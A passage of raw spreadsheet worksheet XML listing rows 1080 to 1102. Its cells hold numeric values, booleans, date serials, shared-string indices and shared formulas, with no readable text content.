        <v>242</v>
      </c>
      <c r="F1080" s="1" t="s">
        <v>4648</v>
      </c>
      <c r="G1080" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1080" s="1" t="s">
        <v>4655</v>
      </c>
      <c r="I1080" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1080" s="1" t="s">
        <v>4650</v>
      </c>
      <c r="K1080" s="2" t="s">
        <v>4651</v>
      </c>
      <c r="L1080" s="1">
        <v>7.0</v>
      </c>
      <c r="M1080" s="1">
        <v>9.0</v>
      </c>
      <c r="N1080" s="1" t="s">
        <v>187</v>
      </c>
      <c r="O1080" s="1" t="s">
        <v>1803</v>
      </c>
      <c r="P1080" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1080" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R1080" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1080" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="1081">
      <c r="A1081" s="1">
        <v>15379.0</v>
      </c>
      <c r="B1081" s="2" t="s">
        <v>4656</v>
      </c>
      <c r="C1081" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1081" s="2" t="s">
        <v>4647</v>
      </c>
      <c r="E1081" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1081" s="1" t="s">
        <v>4657</v>
      </c>
      <c r="G1081" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1081" s="1" t="s">
        <v>4658</v>
      </c>
      <c r="I1081" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1081" s="1" t="s">
        <v>4650</v>
      </c>
      <c r="K1081" s="2" t="s">
        <v>4651</v>
      </c>
      <c r="L1081" s="1">
        <v>7.0</v>
      </c>
      <c r="M1081" s="1">
        <v>9.0</v>
      </c>
      <c r="N1081" s="1" t="s">
        <v>4659</v>
      </c>
      <c r="O1081" s="1" t="s">
        <v>1803</v>
      </c>
      <c r="P1081" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1081" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R1081" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1081" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="1082">
      <c r="A1082" s="1">
        <v>15380.0</v>
      </c>
      <c r="B1082" s="2" t="s">
        <v>4660</v>
      </c>
      <c r="C1082" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1082" s="2" t="s">
        <v>4647</v>
      </c>
      <c r="E1082" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F1082" s="1" t="s">
        <v>4661</v>
      </c>
      <c r="G1082" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1082" s="1" t="s">
        <v>4662</v>
      </c>
      <c r="I1082" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1082" s="1" t="s">
        <v>4650</v>
      </c>
      <c r="K1082" s="2" t="s">
        <v>4651</v>
      </c>
      <c r="L1082" s="1">
        <v>7.0</v>
      </c>
      <c r="M1082" s="1">
        <v>9.0</v>
      </c>
      <c r="N1082" s="1" t="s">
        <v>4663</v>
      </c>
      <c r="O1082" s="1" t="s">
        <v>1803</v>
      </c>
      <c r="P1082" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1082" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R1082" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1082" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="1083">
      <c r="A1083" s="1">
        <v>15384.0</v>
      </c>
      <c r="B1083" s="2" t="s">
        <v>4664</v>
      </c>
      <c r="C1083" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1083" s="2" t="s">
        <v>4665</v>
      </c>
      <c r="E1083" s="2" t="s">
        <v>124</v>
      </c>
      <c r="F1083" s="1" t="s">
        <v>4666</v>
      </c>
      <c r="G1083" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1083" s="4">
        <v>44809.66527777778</v>
      </c>
      <c r="I1083" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J1083" s="1" t="s">
        <v>4667</v>
      </c>
      <c r="K1083" s="2" t="s">
        <v>4668</v>
      </c>
      <c r="L1083" s="1">
        <v>3.0</v>
      </c>
      <c r="M1083" s="1">
        <v>4.0</v>
      </c>
      <c r="N1083" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1083" s="1" t="s">
        <v>4669</v>
      </c>
      <c r="P1083" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1083" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R1083" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S1083" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="1084">
      <c r="A1084" s="1">
        <v>15385.0</v>
      </c>
      <c r="B1084" s="2" t="s">
        <v>4670</v>
      </c>
      <c r="C1084" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1084" s="2" t="s">
        <v>4665</v>
      </c>
      <c r="E1084" s="2" t="s">
        <v>124</v>
      </c>
      <c r="F1084" s="1" t="s">
        <v>791</v>
      </c>
      <c r="G1084" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1084" s="4">
        <v>44839.23263888889</v>
      </c>
      <c r="I1084" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J1084" s="1" t="s">
        <v>4667</v>
      </c>
      <c r="K1084" s="2" t="s">
        <v>4668</v>
      </c>
      <c r="L1084" s="1">
        <v>3.0</v>
      </c>
      <c r="M1084" s="1">
        <v>4.0</v>
      </c>
      <c r="N1084" s="1" t="s">
        <v>4671</v>
      </c>
      <c r="O1084" s="1" t="s">
        <v>4669</v>
      </c>
      <c r="P1084" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1084" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R1084" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1084" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="1085">
      <c r="A1085" s="1">
        <v>15386.0</v>
      </c>
      <c r="B1085" s="2" t="s">
        <v>4672</v>
      </c>
      <c r="C1085" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1085" s="2" t="s">
        <v>4665</v>
      </c>
      <c r="E1085" s="2" t="s">
        <v>4673</v>
      </c>
      <c r="F1085" s="1" t="s">
        <v>629</v>
      </c>
      <c r="G1085" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1085" s="4">
        <v>44839.45138888889</v>
      </c>
      <c r="I1085" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J1085" s="1" t="s">
        <v>4667</v>
      </c>
      <c r="K1085" s="2" t="s">
        <v>4668</v>
      </c>
      <c r="L1085" s="1">
        <v>3.0</v>
      </c>
      <c r="M1085" s="1">
        <v>4.0</v>
      </c>
      <c r="N1085" s="1" t="s">
        <v>4674</v>
      </c>
      <c r="O1085" s="1" t="s">
        <v>4669</v>
      </c>
      <c r="P1085" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1085" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R1085" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1085" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="1086">
      <c r="A1086" s="1">
        <v>15387.0</v>
      </c>
      <c r="B1086" s="2" t="s">
        <v>4675</v>
      </c>
      <c r="C1086" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1086" s="2" t="s">
        <v>4665</v>
      </c>
      <c r="E1086" s="2" t="s">
        <v>4676</v>
      </c>
      <c r="F1086" s="1" t="s">
        <v>4666</v>
      </c>
      <c r="G1086" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1086" s="4">
        <v>44839.76666666667</v>
      </c>
      <c r="I1086" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J1086" s="1" t="s">
        <v>4667</v>
      </c>
      <c r="K1086" s="2" t="s">
        <v>4668</v>
      </c>
      <c r="L1086" s="1">
        <v>3.0</v>
      </c>
      <c r="M1086" s="1">
        <v>4.0</v>
      </c>
      <c r="N1086" s="1" t="s">
        <v>4677</v>
      </c>
      <c r="O1086" s="1" t="s">
        <v>4669</v>
      </c>
      <c r="P1086" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1086" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R1086" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1086" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="1087">
      <c r="A1087" s="1">
        <v>15401.0</v>
      </c>
      <c r="B1087" s="2" t="s">
        <v>4678</v>
      </c>
      <c r="C1087" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1087" s="2" t="s">
        <v>4679</v>
      </c>
      <c r="E1087" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1087" s="1" t="s">
        <v>232</v>
      </c>
      <c r="G1087" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1087" s="1" t="s">
        <v>4680</v>
      </c>
      <c r="I1087" s="1" t="s">
        <v>4681</v>
      </c>
      <c r="J1087" s="1" t="s">
        <v>4682</v>
      </c>
      <c r="K1087" s="2" t="s">
        <v>4683</v>
      </c>
      <c r="L1087" s="1">
        <v>5.0</v>
      </c>
      <c r="M1087" s="1">
        <v>9.0</v>
      </c>
      <c r="N1087" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1087" s="1" t="s">
        <v>4684</v>
      </c>
      <c r="P1087" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1087" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1087" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1087" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1088">
      <c r="A1088" s="1">
        <v>15402.0</v>
      </c>
      <c r="B1088" s="2" t="s">
        <v>4685</v>
      </c>
      <c r="C1088" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1088" s="2" t="s">
        <v>4679</v>
      </c>
      <c r="E1088" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F1088" s="1" t="s">
        <v>4686</v>
      </c>
      <c r="G1088" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1088" s="1" t="s">
        <v>4687</v>
      </c>
      <c r="I1088" s="1" t="s">
        <v>4681</v>
      </c>
      <c r="J1088" s="1" t="s">
        <v>4682</v>
      </c>
      <c r="K1088" s="2" t="s">
        <v>4683</v>
      </c>
      <c r="L1088" s="1">
        <v>5.0</v>
      </c>
      <c r="M1088" s="1">
        <v>9.0</v>
      </c>
      <c r="N1088" s="1" t="s">
        <v>202</v>
      </c>
      <c r="O1088" s="1" t="s">
        <v>4684</v>
      </c>
      <c r="P1088" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1088" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1088" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1088" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1089">
      <c r="A1089" s="1">
        <v>15413.0</v>
      </c>
      <c r="B1089" s="7" t="s">
        <v>4688</v>
      </c>
      <c r="C1089" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1089" s="2" t="s">
        <v>4689</v>
      </c>
      <c r="E1089" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F1089" s="1" t="s">
        <v>23</v>
      </c>
      <c r="G1089" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1089" s="4">
        <v>44234.251388888886</v>
      </c>
      <c r="I1089" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1089" s="1" t="s">
        <v>4690</v>
      </c>
      <c r="K1089" s="2" t="s">
        <v>4691</v>
      </c>
      <c r="L1089" s="1">
        <v>4.0</v>
      </c>
      <c r="M1089" s="1">
        <v>5.0</v>
      </c>
      <c r="N1089" s="1" t="s">
        <v>590</v>
      </c>
      <c r="O1089" s="1" t="s">
        <v>4692</v>
      </c>
      <c r="P1089" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1089" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1089" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1089" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1090">
      <c r="A1090" s="1">
        <v>15423.0</v>
      </c>
      <c r="B1090" s="2" t="s">
        <v>4693</v>
      </c>
      <c r="C1090" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1090" s="2" t="s">
        <v>4694</v>
      </c>
      <c r="E1090" s="2" t="s">
        <v>135</v>
      </c>
      <c r="F1090" s="1" t="s">
        <v>250</v>
      </c>
      <c r="G1090" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1090" s="1" t="s">
        <v>4695</v>
      </c>
      <c r="I1090" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1090" s="1" t="s">
        <v>4696</v>
      </c>
      <c r="K1090" s="2" t="s">
        <v>4697</v>
      </c>
      <c r="L1090" s="1">
        <v>4.0</v>
      </c>
      <c r="M1090" s="1">
        <v>6.0</v>
      </c>
      <c r="N1090" s="1" t="s">
        <v>3931</v>
      </c>
      <c r="O1090" s="1" t="s">
        <v>4698</v>
      </c>
      <c r="P1090" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1090" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1090" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S1090" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="1091">
      <c r="A1091" s="1">
        <v>15444.0</v>
      </c>
      <c r="B1091" s="2" t="s">
        <v>4699</v>
      </c>
      <c r="C1091" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1091" s="2" t="s">
        <v>4700</v>
      </c>
      <c r="E1091" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F1091" s="1" t="s">
        <v>271</v>
      </c>
      <c r="G1091" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1091" s="1" t="s">
        <v>4701</v>
      </c>
      <c r="I1091" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J1091" s="1" t="s">
        <v>4702</v>
      </c>
      <c r="K1091" s="2" t="s">
        <v>4703</v>
      </c>
      <c r="L1091" s="1">
        <v>5.0</v>
      </c>
      <c r="M1091" s="1">
        <v>7.0</v>
      </c>
      <c r="N1091" s="1" t="s">
        <v>681</v>
      </c>
      <c r="O1091" s="1" t="s">
        <v>4704</v>
      </c>
      <c r="P1091" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1091" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R1091" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1091" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="1092">
      <c r="A1092" s="1">
        <v>15445.0</v>
      </c>
      <c r="B1092" s="2" t="s">
        <v>4705</v>
      </c>
      <c r="C1092" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1092" s="2" t="s">
        <v>4700</v>
      </c>
      <c r="E1092" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F1092" s="1" t="s">
        <v>4706</v>
      </c>
      <c r="G1092" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1092" s="1" t="s">
        <v>4707</v>
      </c>
      <c r="I1092" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J1092" s="1" t="s">
        <v>4702</v>
      </c>
      <c r="K1092" s="2" t="s">
        <v>4703</v>
      </c>
      <c r="L1092" s="1">
        <v>5.0</v>
      </c>
      <c r="M1092" s="1">
        <v>7.0</v>
      </c>
      <c r="N1092" s="1" t="s">
        <v>205</v>
      </c>
      <c r="O1092" s="1" t="s">
        <v>4704</v>
      </c>
      <c r="P1092" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1092" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R1092" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1092" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="1093">
      <c r="A1093" s="1">
        <v>15449.0</v>
      </c>
      <c r="B1093" s="2" t="s">
        <v>4708</v>
      </c>
      <c r="C1093" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1093" s="2" t="s">
        <v>4700</v>
      </c>
      <c r="E1093" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F1093" s="1" t="s">
        <v>218</v>
      </c>
      <c r="G1093" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1093" s="4">
        <v>44868.35277777778</v>
      </c>
      <c r="I1093" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J1093" s="1" t="s">
        <v>4702</v>
      </c>
      <c r="K1093" s="2" t="s">
        <v>4703</v>
      </c>
      <c r="L1093" s="1">
        <v>5.0</v>
      </c>
      <c r="M1093" s="1">
        <v>7.0</v>
      </c>
      <c r="N1093" s="1" t="s">
        <v>4709</v>
      </c>
      <c r="O1093" s="1" t="s">
        <v>4704</v>
      </c>
      <c r="P1093" s="1" t="s">
        <v>3169</v>
      </c>
      <c r="Q1093" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R1093" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1093" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="1094">
      <c r="A1094" s="1">
        <v>15482.0</v>
      </c>
      <c r="B1094" s="2" t="s">
        <v>4710</v>
      </c>
      <c r="C1094" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1094" s="2" t="s">
        <v>4711</v>
      </c>
      <c r="E1094" s="2" t="s">
        <v>4712</v>
      </c>
      <c r="F1094" s="1" t="s">
        <v>4713</v>
      </c>
      <c r="G1094" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1094" s="4">
        <v>44323.72430555556</v>
      </c>
      <c r="I1094" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1094" s="1" t="s">
        <v>4714</v>
      </c>
      <c r="K1094" s="2" t="s">
        <v>4715</v>
      </c>
      <c r="L1094" s="1">
        <v>9.0</v>
      </c>
      <c r="M1094" s="1">
        <v>16.0</v>
      </c>
      <c r="N1094" s="1" t="s">
        <v>276</v>
      </c>
      <c r="O1094" s="1" t="s">
        <v>4716</v>
      </c>
      <c r="P1094" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1094" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1094" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S1094" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="1095">
      <c r="A1095" s="1">
        <v>15530.0</v>
      </c>
      <c r="B1095" s="2" t="s">
        <v>4717</v>
      </c>
      <c r="C1095" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1095" s="2" t="s">
        <v>4718</v>
      </c>
      <c r="E1095" s="2" t="s">
        <v>135</v>
      </c>
      <c r="F1095" s="1" t="s">
        <v>4719</v>
      </c>
      <c r="G1095" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1095" s="4">
        <v>44451.46666666667</v>
      </c>
      <c r="I1095" s="1" t="s">
        <v>2570</v>
      </c>
      <c r="J1095" s="1" t="s">
        <v>4720</v>
      </c>
      <c r="K1095" s="2" t="s">
        <v>4721</v>
      </c>
      <c r="L1095" s="1">
        <v>1.0</v>
      </c>
      <c r="M1095" s="1">
        <v>1.0</v>
      </c>
      <c r="N1095" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1095" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P1095" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1095" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1095" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1095" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1096">
      <c r="A1096" s="1">
        <v>15531.0</v>
      </c>
      <c r="B1096" s="2" t="s">
        <v>4722</v>
      </c>
      <c r="C1096" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1096" s="2" t="s">
        <v>4723</v>
      </c>
      <c r="E1096" s="2" t="s">
        <v>1001</v>
      </c>
      <c r="F1096" s="1" t="s">
        <v>182</v>
      </c>
      <c r="G1096" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1096" s="4">
        <v>44022.93125</v>
      </c>
      <c r="I1096" s="1" t="s">
        <v>2570</v>
      </c>
      <c r="J1096" s="1" t="s">
        <v>4724</v>
      </c>
      <c r="K1096" s="2" t="s">
        <v>4725</v>
      </c>
      <c r="L1096" s="1">
        <v>2.0</v>
      </c>
      <c r="M1096" s="1">
        <v>3.0</v>
      </c>
      <c r="N1096" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1096" s="1" t="s">
        <v>4726</v>
      </c>
      <c r="P1096" s="1" t="s">
        <v>1865</v>
      </c>
      <c r="Q1096" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1096" s="2">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="S1096" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="1097">
      <c r="A1097" s="1">
        <v>15532.0</v>
      </c>
      <c r="B1097" s="2" t="s">
        <v>4727</v>
      </c>
      <c r="C1097" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1097" s="2" t="s">
        <v>4723</v>
      </c>
      <c r="E1097" s="8" t="s">
        <v>51</v>
      </c>
      <c r="F1097" s="1" t="s">
        <v>2568</v>
      </c>
      <c r="G1097" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1097" s="4">
        <v>44053.103472222225</v>
      </c>
      <c r="I1097" s="1" t="s">
        <v>2570</v>
      </c>
      <c r="J1097" s="1" t="s">
        <v>4724</v>
      </c>
      <c r="K1097" s="2" t="s">
        <v>4725</v>
      </c>
      <c r="L1097" s="1">
        <v>2.0</v>
      </c>
      <c r="M1097" s="1">
        <v>3.0</v>
      </c>
      <c r="N1097" s="1" t="s">
        <v>4728</v>
      </c>
      <c r="O1097" s="1" t="s">
        <v>4726</v>
      </c>
      <c r="P1097" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1097" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1097" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1097" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="1098">
      <c r="A1098" s="1">
        <v>15534.0</v>
      </c>
      <c r="B1098" s="2" t="s">
        <v>4729</v>
      </c>
      <c r="C1098" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1098" s="2" t="s">
        <v>4730</v>
      </c>
      <c r="E1098" s="8" t="s">
        <v>2547</v>
      </c>
      <c r="F1098" s="1" t="s">
        <v>4731</v>
      </c>
      <c r="G1098" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1098" s="4">
        <v>44597.73888888889</v>
      </c>
      <c r="I1098" s="1" t="s">
        <v>2570</v>
      </c>
      <c r="J1098" s="1" t="s">
        <v>4732</v>
      </c>
      <c r="K1098" s="2" t="s">
        <v>4733</v>
      </c>
      <c r="L1098" s="1">
        <v>1.0</v>
      </c>
      <c r="M1098" s="1">
        <v>1.0</v>
      </c>
      <c r="N1098" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1098" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P1098" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1098" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1098" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S1098" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="1099">
      <c r="A1099" s="1">
        <v>15535.0</v>
      </c>
      <c r="B1099" s="2" t="s">
        <v>4734</v>
      </c>
      <c r="C1099" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1099" s="2" t="s">
        <v>4735</v>
      </c>
      <c r="E1099" s="8" t="s">
        <v>605</v>
      </c>
      <c r="F1099" s="1" t="s">
        <v>4736</v>
      </c>
      <c r="G1099" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1099" s="4">
        <v>44379.94513888889</v>
      </c>
      <c r="I1099" s="1" t="s">
        <v>2570</v>
      </c>
      <c r="J1099" s="1" t="s">
        <v>4737</v>
      </c>
      <c r="K1099" s="2" t="s">
        <v>4738</v>
      </c>
      <c r="L1099" s="1">
        <v>1.0</v>
      </c>
      <c r="M1099" s="1">
        <v>1.0</v>
      </c>
      <c r="N1099" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1099" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P1099" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1099" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1099" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1099" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1100">
      <c r="A1100" s="1">
        <v>15541.0</v>
      </c>
      <c r="B1100" s="2" t="s">
        <v>4739</v>
      </c>
      <c r="C1100" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1100" s="2" t="s">
        <v>4735</v>
      </c>
      <c r="E1100" s="8" t="s">
        <v>242</v>
      </c>
      <c r="F1100" s="1" t="s">
        <v>4740</v>
      </c>
      <c r="G1100" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1100" s="4">
        <v>43963.191666666666</v>
      </c>
      <c r="I1100" s="1" t="s">
        <v>2570</v>
      </c>
      <c r="J1100" s="1" t="s">
        <v>4741</v>
      </c>
      <c r="K1100" s="2" t="s">
        <v>4742</v>
      </c>
      <c r="L1100" s="1">
        <v>3.0</v>
      </c>
      <c r="M1100" s="1">
        <v>4.0</v>
      </c>
      <c r="N1100" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1100" s="1" t="s">
        <v>4743</v>
      </c>
      <c r="P1100" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1100" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1100" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1100" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="1101">
      <c r="A1101" s="1">
        <v>15542.0</v>
      </c>
      <c r="B1101" s="2" t="s">
        <v>4744</v>
      </c>
      <c r="C1101" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1101" s="2" t="s">
        <v>4735</v>
      </c>
      <c r="E1101" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F1101" s="1" t="s">
        <v>4745</v>
      </c>
      <c r="G1101" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1101" s="4">
        <v>43963.254166666666</v>
      </c>
      <c r="I1101" s="1" t="s">
        <v>2570</v>
      </c>
      <c r="J1101" s="1" t="s">
        <v>4741</v>
      </c>
      <c r="K1101" s="2" t="s">
        <v>4742</v>
      </c>
      <c r="L1101" s="1">
        <v>3.0</v>
      </c>
      <c r="M1101" s="1">
        <v>4.0</v>
      </c>
      <c r="N1101" s="1" t="s">
        <v>334</v>
      </c>
      <c r="O1101" s="1" t="s">
        <v>4743</v>
      </c>
      <c r="P1101" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1101" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1101" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1101" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="1102">
      <c r="A1102" s="1">
        <v>15543.0</v>
      </c>
      <c r="B1102" s="2" t="s">
        <v>4746</v>
      </c>
      <c r="C1102" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1102" s="2" t="s">
        <v>4735</v>
      </c>
      <c r="E1102" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F1102" s="1" t="s">
        <v>4747</v>
      </c>
      <c r="G1102" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1102" s="4">
        <v>43963.319444444445</v>
      </c>
      <c r="I1102" s="1" t="s">
        <v>2570</v>
      </c>
      <c r="J1102" s="1" t="s">
        <v>4741</v>
      </c>
      <c r="K1102" s="2" t="s">
        <v>4742</v>
      </c>
      <c r="L1102" s="1">
        <v>3.0</v>
      </c>
      <c r="M1102" s="1">
        <v>4.0</v>
      </c>
      <c r="N1102" s="1" t="s">
        <v>822</v>
      </c>
      <c r="O1102" s="1" t="s">
        <v>4743</v>
      </c>
      <c r="P1102" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1102" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1102" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S1102" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
